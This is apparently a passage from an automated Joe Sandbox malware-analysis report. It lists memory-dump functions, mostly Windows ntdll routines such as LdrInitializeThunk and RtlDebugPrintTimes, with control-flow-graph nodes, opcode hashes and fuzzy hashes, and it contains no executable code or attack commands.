                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0df5472cdf3baf70d0fa522b6b14c7201e75628ccfac7c0be9ad352b4e56d10c
                                                                                    • Instruction ID: fcd417f37c7315818ae5ba4386526509433bcc75b35225ce09e7c05bdde14bed
                                                                                    • Opcode Fuzzy Hash: 0df5472cdf3baf70d0fa522b6b14c7201e75628ccfac7c0be9ad352b4e56d10c
                                                                                    • Instruction Fuzzy Hash: 3D90027120158802D1107158840474E0049A7D0311F5DC811A8424B58DC6D589917261
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01552C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 5 1552c1d-1552c26 LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0156FD4F,000000FF,00000024,01606634,00000004,00000000,?,-00000018,7D810F61,?,?,01528B12,?,?,?,?), ref: 01552C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 974290753a9a3dba5bdf32e7f82a0c0e13794f10abe48dc61d6ef81fe33d04c2
                                                                                    • Instruction ID: 16d6aeb991278702bbe0ed845a75fbebc2350ff57aa70b34c4157effdd460b80
                                                                                    • Opcode Fuzzy Hash: 974290753a9a3dba5bdf32e7f82a0c0e13794f10abe48dc61d6ef81fe33d04c2
                                                                                    • Instruction Fuzzy Hash: 90A00271401715478241EA19489456EB154BED062534DC346D5464941A57641491B6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 015535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 8 15535c0-15535cc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: df5bac9e3676624f1b249e0e2493cdc330610162412950a165c92b8bb14be913
                                                                                    • Instruction ID: 3158f90ae95c1cc535f8574225d220287b1885343fd1dea0142d2eed21e5db29
                                                                                    • Opcode Fuzzy Hash: df5bac9e3676624f1b249e0e2493cdc330610162412950a165c92b8bb14be913
                                                                                    • Instruction Fuzzy Hash: F590027160560402D1007158451470A1049A7D0211F69C811A4424A68DC7D58A5166E2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042D633 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 9 42d633-42d671 call 42dad3 13 42d673-42d690 9->13 14 42d6c0-42d6c5 9->14 16 42d692-42d6a0 13->16 17 42d6a3-42d6a9 13->17 16->17 19 42d6af-42d6bd 17->19 19->14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d716f48b751a58e0cdbd6e06fc7521334ed698d4612934a6e6a887ec6bb78fa
                                                                                    • Instruction ID: 2b77333e587a1906345f76ac27d82602a4bd6c26be102e6b3ff16b01d31e0ec9
                                                                                    • Opcode Fuzzy Hash: 2d716f48b751a58e0cdbd6e06fc7521334ed698d4612934a6e6a887ec6bb78fa
                                                                                    • Instruction Fuzzy Hash: 3A01DBF1D8122F56FB20FA55DD02FAA73789B44304F8482F9A54CE1183F77867488E95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042D994 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 21 42d994-42d9ce 22 42d9d4-42d9e5 21->22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bcef6324d63d1b633281ba7164c9799e89ec0e94ac62195b90e3c4958115859d
                                                                                    • Instruction ID: f82e77c35b469c81d80eb763f433dbfd0a1a3eadd0652367cc43b8bac2b975da
                                                                                    • Opcode Fuzzy Hash: bcef6324d63d1b633281ba7164c9799e89ec0e94ac62195b90e3c4958115859d
                                                                                    • Instruction Fuzzy Hash: 08F0E27155024DAFEB44CF60DC85AF6BB59EB46260F098398F9794B546CA309641CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042DB09 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 23 42db09-42db28 24 42db2e-42db35 23->24 25 42db37-42db39 24->25 26 42db49-42db4c 24->26 25->26 27 42db3b-42db47 call 42dad3 25->27 27->26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3d45ef213fd381a583e1e562944203c9025f30985e5aaf0ca27d9353247008bc
                                                                                    • Instruction ID: d8ff959243e72db636ccca90c5b15a191ac5ad5929dcd1327a5b05524173a608
                                                                                    • Opcode Fuzzy Hash: 3d45ef213fd381a583e1e562944203c9025f30985e5aaf0ca27d9353247008bc
                                                                                    • Instruction Fuzzy Hash: B7E09B32F0016027C7209655AC06FABBB6CEBC5760F59416EFE08D7341E569590187D5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042DB13 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 32 42db13-42db28 33 42db2e-42db35 32->33 34 42db37-42db39 33->34 35 42db49-42db4c 33->35 34->35 36 42db3b-42db47 call 42dad3 34->36 36->35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d625ea3dca0c75e19f1c1b3729e795ca8611507ce219bb915ed34ba17e03250
                                                                                    • Instruction ID: 294a60e7bff18ac93f83d95f5352329a774604f43a197cb9c2879fd0e004ba92
                                                                                    • Opcode Fuzzy Hash: 1d625ea3dca0c75e19f1c1b3729e795ca8611507ce219bb915ed34ba17e03250
                                                                                    • Instruction Fuzzy Hash: B0E04876B0022427D62055496C16FA7B75CDBC5B60F55406AFF0897341D564B90042E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042D9A3 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 30 42d9a3-42d9ce 31 42d9d4-42d9e5 30->31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b751c575aa4fd824649aef535ca6a40ffc86a40572605f87d24a041de2ef5782
                                                                                    • Instruction ID: 2fbdd99c3ae85f983e073db4bf590443fad296b64c456b2aa6795b106325922e
                                                                                    • Opcode Fuzzy Hash: b751c575aa4fd824649aef535ca6a40ffc86a40572605f87d24a041de2ef5782
                                                                                    • Instruction Fuzzy Hash: 13F09876610209AFDB04DF59D881EEA73A9EB88750F04C559FD198B245DB74EA10CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042DA33 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 39 42da33-42da46 40 42da4c-42da50 39->40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef70f9277747718e899a68981fab092bfec69a7b7c993949d4fc72e9d6bc9cf1
                                                                                    • Instruction ID: ffdde4aad5e54e811c865867d416f018efe5ffabe9e7bdbc1f60731bbb43f952
                                                                                    • Opcode Fuzzy Hash: ef70f9277747718e899a68981fab092bfec69a7b7c993949d4fc72e9d6bc9cf1
                                                                                    • Instruction Fuzzy Hash: F0C012B16002086BDB04EA89DC46F6533DCA708610F448055BA0C8B241D974B9104794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0152A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 305 152a250-152a26f 306 152a275-152a291 305->306 307 152a58d-152a594 305->307 309 15779e6-15779eb 306->309 310 152a297-152a2a0 306->310 307->306 308 152a59a-15779bb 307->308 308->306 315 15779c1-15779c6 308->315 310->309 311 152a2a6-152a2ac 310->311 313 152a2b2-152a2b4 311->313 314 152a6ba-152a6bc 311->314 313->309 317 152a2ba-152a2bd 313->317 316 152a6c2 314->316 314->317 318 152a473-152a479 315->318 319 152a2c3-152a2c6 316->319 317->309 317->319 320 152a2da-152a2dd 319->320 321 152a2c8-152a2d1 319->321 324 152a2e3-152a32b 320->324 325 152a6c7-152a6d0 320->325 322 152a2d7 321->322 323 15779cb-15779d5 321->323 322->320 327 15779da-15779e3 call 159f290 323->327 328 152a330-152a335 324->328 325->324 326 152a6d6-15779ff 325->326 326->327 327->309 331 152a33b-152a343 328->331 332 152a47c-152a47f 328->332 334 152a34f-152a35d 331->334 336 152a345-152a349 331->336 333 152a485-152a488 332->333 332->334 337 1577a16-1577a19 333->337 338 152a48e-152a49e 333->338 334->338 340 152a363-152a368 334->340 336->334 339 152a59f-152a5a8 336->339 341 1577a1f-1577a24 337->341 342 152a36c-152a36e 337->342 338->337 343 152a4a4-152a4ad 338->343 344 152a5c0-152a5c3 339->344 345 152a5aa-152a5ac 339->345 340->342 346 1577a2b 341->346 350 1577a26 342->350 351 152a374-152a38c call 152a6e0 342->351 343->342 348 1577a01 344->348 349 152a5c9-152a5cc 344->349 345->334 347 152a5b2-152a5bb 345->347 352 1577a2d-1577a2f 346->352 347->342 354 1577a0c 348->354 353 152a5d2-152a5d5 349->353 349->354 350->346 358 152a4b2-152a4b9 351->358 359 152a392-152a3ba 351->359 352->318 357 1577a35 352->357 353->345 354->337 360 152a3bc-152a3be 358->360 361 152a4bf-152a4c2 358->361 359->360 360->352 362 152a3c4-152a3cb 360->362 361->360 363 152a4c8-152a4d3 361->363 364 152a3d1-152a3d4 362->364 365 1577ae0 362->365 363->328 366 152a3e0-152a3ea 364->366 367 1577ae4-1577afc call 159f290 365->367 366->367 369 152a3f0-152a40c call 152a840 366->369 367->318 373 152a412-152a417 369->373 374 152a5d7-152a5e0 369->374 373->318 375 152a419-152a43d 373->375 376 152a5e2-152a5eb 374->376 377 152a601-152a603 374->377 379 152a440-152a443 375->379 376->377 378 152a5ed-152a5f1 376->378 380 152a605-152a623 call 1514508 377->380 381 152a629-152a631 377->381 382 152a681-152a6ab RtlDebugPrintTimes 378->382 383 152a5f7-152a5fb 378->383 384 152a4d8-152a4dc 379->384 385 152a449-152a44c 379->385 380->318 380->381 382->377 404 152a6b1-152a6b5 382->404 383->377 383->382 390 152a4e2-152a4e5 384->390 391 1577a3a-1577a42 384->391 387 152a452-152a454 385->387 388 1577ad6 385->388 392 152a520-152a539 call 152a6e0 387->392 393 152a45a-152a461 387->393 388->365 394 152a634-152a64a 390->394 396 152a4eb-152a4ee 390->396 391->394 395 1577a48-1577a4c 391->395 412 152a65e-152a665 392->412 413 152a53f-152a567 392->413 398 152a467-152a46c 393->398 399 152a57b-152a582 393->399 400 152a650-152a659 394->400 401 152a4f4-152a50c 394->401 395->394 402 1577a52-1577a5b 395->402 396->385 396->401 398->318 406 152a46e 398->406 399->366 405 152a588 399->405 400->387 401->385 409 152a512-152a51b 401->409 407 1577a85-1577a87 402->407 408 1577a5d-1577a60 402->408 404->377 405->365 406->318 407->394 411 1577a8d-1577a96 407->411 414 1577a62-1577a6c 408->414 415 1577a6e-1577a71 408->415 409->387 411->387 416 152a569-152a56b 412->416 417 152a66b-152a66e 412->417 413->416 418 1577a81 414->418 419 1577a73-1577a7c 415->419 420 1577a7e 415->420 416->398 421 152a571-152a573 416->421 417->416 422 152a674-152a67c 417->422 418->407 419->411 420->418 423 152a579 421->423 424 1577a9b-1577aa4 421->424 422->379 423->399 424->423 425 1577aaa-1577ab0 424->425 425->423 426 1577ab6-1577abe 425->426 426->423 427 1577ac4-1577acf 426->427 427->426 428 1577ad1 427->428 428->423
                                                                                    Strings
                                                                                    • SsHd, xrefs: 0152A3E4
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015779FA
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 015779D0, 015779F5
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015779D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-929470617
                                                                                    • Opcode ID: 363fc88ae14c95428c5a21ee16f8b556a1edb7dec5ff5c64b48c9f64cd01ce51
                                                                                    • Instruction ID: 2ddc3f1d534aa4d1495d50e1744ed89b5cffa326e25fb1d4f792afffbf4f0482
                                                                                    • Opcode Fuzzy Hash: 363fc88ae14c95428c5a21ee16f8b556a1edb7dec5ff5c64b48c9f64cd01ce51
                                                                                    • Instruction Fuzzy Hash: 1FE1D4726043128FE725CF28D888B2FBBE1BB8A214F144A2DE955CF6D1D771E945CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0150C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    • Opcode ID: e078812a43dacd586a61085044f866ac7b6c338a9302a23cc72b19bd7f90a6ba
                                                                                    • Instruction ID: 494c36667590ec2db2470b5492f546b29b66ffc7f5c99a69187823211d2534d9
                                                                                    • Opcode Fuzzy Hash: e078812a43dacd586a61085044f866ac7b6c338a9302a23cc72b19bd7f90a6ba
                                                                                    • Instruction Fuzzy Hash: 42115232A04219EBCF169F94DC4869D7B72FF44365F108519F86A6B2D0CB715E50CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%